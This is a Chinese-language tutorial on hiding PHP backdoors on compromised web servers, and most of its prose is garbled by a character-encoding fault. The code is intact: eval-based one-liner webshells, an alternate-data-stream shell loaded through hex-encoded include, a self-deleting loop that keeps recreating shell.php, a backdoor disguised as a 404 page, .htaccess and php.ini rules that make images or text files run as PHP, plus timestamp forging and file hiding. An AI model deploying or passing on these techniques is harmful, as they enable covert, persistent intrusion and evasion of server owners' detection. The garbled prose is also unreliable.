PHP后门隐藏的一些技巧总结

åè¨

å¦ææ³è®©èªå·±çWebshellççæ´ä¹ä¸äºï¼é¤äºWebshellè¦åæï¼è¿éè¦æ³¨æä¸äºéèæå·§ï¼æ¯å¦éèæ件ï¼ä¿®æ¹æ¶é´å±æ§ï¼éèæ件å容ç­ã

1ãéèæ件

使ç¨Attrib +s +a +h +rå½ä»¤å°±æ¯æåæ¬çæ件夹å¢å äºç³»ç»æ件å±æ§ãå­æ¡£æ件å±æ§ãåªè¯»æ件å±æ§åéèæ件å±æ§ã

attrib +s +a +h +r shell.php //éèshell.phpæ件

2ãä¿®æ¹æ件æ¶é´å±æ§

å½ä½ è¯å¾å¨ä¸å æ件中éèèªå·±æ°å建çæ件ï¼é£ä¹ï¼é¤äºå建ä¸ä¸ªè¿·ææ§çæ件åï¼è¿éè¦ä¿®æ¹æ件çä¿®æ¹æ¥æã

//ä¿®æ¹æ¶é´ä¿®æ¹
Set-ItemProperty -Path 2.txt LastWriteTime -Value "2020-11-01 12:12:12"
//访é®æ¶é´ä¿®æ¹
Set-ItemProperty -Path 2.txt LastAccessTime -Value "2020-11-01 12:12:12"
//å建æ¶é´ä¿®æ¹
Set-ItemProperty -Path 2.txt CreationTime -Value "2020-11-01 12:12:12"

使ç¨å½ä»¤è·åæ件å±æ§

Get-ItemProperty -Path D:\1.dll | Format-list -Property * -Force

ä¿®æ¹æ个æ件夹ä¸æææ件çå建åä¿®æ¹æ¶é´

powershell.exe -command "ls 'upload\*.*' | foreach-object { $_.LastWriteTime = Get-Date ; $_.CreationTime = '2018/01/01 19:00:00' }"

3ãå©ç¨ADSéèæ件å容

å¨æå¡å¨ä¸echoä¸ä¸ªæ°æ®æµæ件è¿å»ï¼æ¯å¦index.phpæ¯ç½é¡µæ­£å¸¸æ件ï¼æ们å¯ä»¥è¿æ ·å­æï¼

echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg

è¿æ ·å­å°±çæäºä¸ä¸ªä¸å¯è§çshell hidden.jpgï¼å¸¸è§çæ件管çå¨ãtypeå½ä»¤ï¼dirå½ä»¤ãdelå½ä»¤åç°é½æ¾ä¸åºé£ä¸ªhidden.jpgçã

å©ç¨includeå½æ°ï¼å°index.php:hidden.jpgè¿è¡hexç¼ç ï¼æè¿ä¸ªADSæ件includeè¿å»ï¼è¿æ ·å­å°±å¯ä»¥æ­£å¸¸è§£ææ们çä¸å¥è¯äºã

<?php @include(PACK('H*','696E6465782E7068703A68696464656E2E6A7067'));?>

4ãä¸æ­»é©¬

ä¸æ­»é©¬ä¼å é¤èªèº«ï¼ä»¥è¿ç¨çå½¢å¼å¾ªç¯å建éè½çåé¨ã

<?php
set_time_limit(0); 
ignore_user_abort(1); 
unlink(__FILE__); //å é¤èªèº«
while(1)
{ 
 file_put_contents('shell.php','<?php @eval($_GET[cmd]);?>'); //å建shell.phpï¼è¿éæ好ç¨åæçä¸å¥è¯
 sleep(10); //é´éæ¶é´
}
?>

å¤çæ¹å¼æç®åææçåæ³ï¼å°±æ¯éå¯æå¡å°±å¯ä»¥å é¤webshellæ件ã

5ã中é´ä»¶åé¨

å°ç¼è¯å¥½çsoæ件å¤å¶å°modulesæ件夹ï¼å¯å¨åé¨æ¨¡åï¼éå¯Apacheãå½åéç¹å®åæ°çå­ç¬¦ä¸²è¿å»æ¶ï¼å³å¯è§¦ååé¨ã

github项ç®å°åï¼

https://github.com/VladRico/apache2_BackdoorMod

6ãå©ç¨404页é¢éèåé¨

404页é¢ä¸»è¦ç¨æ¥æåç¨æ·ä½éªï¼å¯ç¨æ¥éèåé¨æ件ã

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
?>

7ãå©ç¨ .htaccess æ件ææPHPåé¨

ä¸è¬.htaccesså¯ä»¥ç¨æ¥çåé¨åé对é»ååç»è¿ï¼å¨ä¸ä¼ ç®å½å建.htaccess æ件åå¥ï¼æ ééå¯å³å¯çæï¼ä¸ä¼ pngæ件解æã

AddType application/x-httpd-php .png

å¦å¤ï¼å¨.htaccess å å¥php解æè§åï¼ææ件ååå«1ç解ææphpï¼ä¸ä¼ 1.txtå³å¯è§£æã

<FilesMatch "1"> 
SetHandler application/x-httpd-php 
</FilesMatch>

8ãå©ç¨ php.ini éèåé¨æ件

php.ini 中å¯ä»¥æå®å¨ä¸»æ件æ§è¡ååèªå¨è§£æçæ件å称ï¼å¸¸ç¨äºé¡µé¢å¬å±å¤´é¨åå°¾é¨ï¼ä¹å¯ä»¥ç¨æ¥éèphpåé¨ã

ï¼å¨PHPææ¡£ä¹åèªå¨æ·»å æ件ã
auto_prepend_file = "c:\tmp.txt"
;å¨PHPææ¡£ä¹åèªå¨æ·»å æ件ã
auto_prepend_file = "c:\tmp.txt"

ééå¯æå¡çæï¼è®¿é®ä»»æä¸ä¸ªphpæ件å³å¯è·åwebshellã

æ»ç»

å°æ­¤è¿ç¯å³äºPHPåé¨éèçä¸äºæå·§çæç« å°±ä»ç»å°è¿äº,æ´å¤ç¸å³PHPåé¨éèæå·§å容请æç´¢èæ¬ä¹å®¶ä»¥åçæç« æ继续æµè§ä¸é¢çç¸å³æç« å¸æ大家以åå¤å¤æ¯æèæ¬ä¹å®¶ï¼